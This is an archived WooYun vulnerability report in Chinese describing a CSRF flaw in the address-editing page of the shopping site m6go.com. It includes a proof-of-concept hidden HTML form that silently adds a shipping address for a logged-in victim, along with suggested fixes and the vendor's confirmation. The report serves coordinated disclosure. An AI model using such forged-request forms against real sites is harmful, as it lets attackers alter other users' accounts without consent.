当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106712

漏洞标题:麦乐购某处一枚CSRF

相关厂商:麦乐购

漏洞作者: 第四维度

提交时间:2015-04-10 10:00

修复时间:2015-05-26 10:44

公开时间:2015-05-26 10:44

漏洞类型:CSRF

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-10: 细节已通知厂商并且等待厂商处理中
2015-04-11: 厂商已经确认,细节仅向厂商公开
2015-04-21: 细节向核心白帽子及相关领域专家公开
2015-05-01: 细节向普通白帽子公开
2015-05-11: 细节向实习白帽子公开
2015-05-26: 细节向公众公开

简要描述:

POST

详细说明:

http://www.m6go.com/my/myAddressList.do


问题在收货地址
添加一个收货地址看看

麦乐购1.png


构造表单试试

漏洞证明:

<form method="POST" name="form0" action="http://www.m6go.com:80/my/doEditAddress.do">
<input type="hidden" name="MAddressInfo.AddressId" value=""/>
<input type="hidden" name="MAddressInfo.UserId" value=""/>
<input type="hidden" name="MAddressInfo.TrueName" value="dfsadf"/>
<input type="hidden" name="pro" value="17,420000"/>
<input type="hidden" name="city" value="17,14,423000"/>
<input type="hidden" name="zone" value="423001"/>
<input type="hidden" name="MAddressInfo.Zip" value="433000"/>
<input type="hidden" name="MAddressInfo.DetailAddress" value="sadfsadfsadfsadf"/>
<input type="hidden" name="MAddressInfo.LinkPhone" value=""/>
<input type="hidden" name="MAddressInfo.HandPhone" value="13800138002"/>
<input type="hidden" name="MAddressInfo.Email" value=""/>
<input type="hidden" name="slcardtype" value="-----¶þ´úÉí·ÝÖ¤-----"/>
<input type="hidden" name="MAddressInfo.IdCard" value=""/>
<input type="hidden" name="Img_IUrl" value=""/>
<input type="hidden" name="Img1_IUrl" value=""/>
<input type="hidden" name="button" value="±£´æ"/>
</form>


提交

麦乐购3.png


可以看到已经添加了

修复方案:

1、增加对来源的认证
2、token

版权声明:转载请注明来源 第四维度@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-04-11 10:43

厂商回复:

已经处理

最新状态:

暂无